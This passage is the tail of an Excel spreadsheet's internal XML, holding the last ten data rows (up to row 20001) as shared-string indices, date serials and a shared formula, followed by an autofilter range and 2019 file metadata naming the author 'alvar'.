      </c>
      <c r="B19992">
        <v>4991</v>
      </c>
      <c r="C19992" t="s">
        <v>25497</v>
      </c>
      <c r="D19992" s="1">
        <v>43719</v>
      </c>
      <c r="F19992" t="s">
        <v>9975</v>
      </c>
      <c r="G19992" t="s">
        <v>31907</v>
      </c>
    </row>
    <row r="19993" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19993">
        <f t="shared" si="312"/>
        <v>19992</v>
      </c>
      <c r="B19993">
        <v>4992</v>
      </c>
      <c r="C19993" t="s">
        <v>25497</v>
      </c>
      <c r="D19993" s="1">
        <v>43713</v>
      </c>
      <c r="E19993" t="s">
        <v>25614</v>
      </c>
      <c r="F19993" t="s">
        <v>9975</v>
      </c>
      <c r="G19993" t="s">
        <v>31908</v>
      </c>
    </row>
    <row r="19994" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19994">
        <f t="shared" si="312"/>
        <v>19993</v>
      </c>
      <c r="B19994">
        <v>4993</v>
      </c>
      <c r="C19994" t="s">
        <v>25497</v>
      </c>
      <c r="D19994" s="1">
        <v>43711</v>
      </c>
      <c r="E19994" t="s">
        <v>25504</v>
      </c>
      <c r="F19994" t="s">
        <v>9975</v>
      </c>
      <c r="G19994" t="s">
        <v>31909</v>
      </c>
    </row>
    <row r="19995" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19995">
        <f t="shared" si="312"/>
        <v>19994</v>
      </c>
      <c r="B19995">
        <v>4994</v>
      </c>
      <c r="C19995" t="s">
        <v>25497</v>
      </c>
      <c r="D19995" s="1">
        <v>43732</v>
      </c>
      <c r="E19995" t="s">
        <v>25517</v>
      </c>
      <c r="F19995" t="s">
        <v>9975</v>
      </c>
      <c r="G19995" t="s">
        <v>31910</v>
      </c>
    </row>
    <row r="19996" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19996">
        <f t="shared" si="312"/>
        <v>19995</v>
      </c>
      <c r="B19996">
        <v>4995</v>
      </c>
      <c r="C19996" t="s">
        <v>25497</v>
      </c>
      <c r="D19996" s="1">
        <v>43732</v>
      </c>
      <c r="F19996" t="s">
        <v>9975</v>
      </c>
      <c r="G19996" t="s">
        <v>31911</v>
      </c>
    </row>
    <row r="19997" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19997">
        <f t="shared" si="312"/>
        <v>19996</v>
      </c>
      <c r="B19997">
        <v>4996</v>
      </c>
      <c r="C19997" t="s">
        <v>25497</v>
      </c>
      <c r="D19997" s="1">
        <v>43717</v>
      </c>
      <c r="E19997" t="s">
        <v>25942</v>
      </c>
      <c r="F19997" t="s">
        <v>9975</v>
      </c>
      <c r="G19997" t="s">
        <v>31912</v>
      </c>
    </row>
    <row r="19998" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19998">
        <f t="shared" si="312"/>
        <v>19997</v>
      </c>
      <c r="B19998">
        <v>4997</v>
      </c>
      <c r="C19998" t="s">
        <v>25497</v>
      </c>
      <c r="D19998" s="1">
        <v>43725</v>
      </c>
      <c r="E19998" t="s">
        <v>25517</v>
      </c>
      <c r="F19998" t="s">
        <v>9975</v>
      </c>
      <c r="G19998" t="s">
        <v>31913</v>
      </c>
    </row>
    <row r="19999" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19999">
        <f t="shared" si="312"/>
        <v>19998</v>
      </c>
      <c r="B19999">
        <v>4998</v>
      </c>
      <c r="C19999" t="s">
        <v>25497</v>
      </c>
      <c r="D19999" s="1">
        <v>43720</v>
      </c>
      <c r="E19999" t="s">
        <v>31914</v>
      </c>
      <c r="F19999" t="s">
        <v>9975</v>
      </c>
      <c r="G19999" t="s">
        <v>31915</v>
      </c>
    </row>
    <row r="20000" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A20000">
        <f t="shared" si="312"/>
        <v>19999</v>
      </c>
      <c r="B20000">
        <v>4999</v>
      </c>
      <c r="C20000" t="s">
        <v>25497</v>
      </c>
      <c r="D20000" s="1">
        <v>43720</v>
      </c>
      <c r="E20000" t="s">
        <v>31916</v>
      </c>
      <c r="F20000" t="s">
        <v>10526</v>
      </c>
      <c r="G20000" t="s">
        <v>31917</v>
      </c>
    </row>
    <row r="20001" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A20001">
        <f t="shared" si="312"/>
        <v>20000</v>
      </c>
      <c r="B20001">
        <v>5000</v>
      </c>
      <c r="C20001" t="s">
        <v>25497</v>
      </c>
      <c r="D20001" s="1">
        <v>43712</v>
      </c>
      <c r="E20001" t="s">
        <v>27997</v>
      </c>
      <c r="F20001" t="s">
        <v>9975</v>
      </c>
      <c r="G20001" t="s">
        <v>31918</v>
      </c>
    </row>
  </sheetData>
  <autoFilter ref="A1:G20001" xr:uid="{0A96AE6F-5862-4609-BC2A-0EF27BC3D86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All_Data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alvar</dc:creator>
  <cp:lastModifiedBy>alvar</cp:lastModifiedBy>
  <dcterms:created xsi:type="dcterms:W3CDTF">2019-10-20T01:12:59Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2019-10-20T01:17:50Z</dcterms:modified>
</cp:coreProperties>
</file>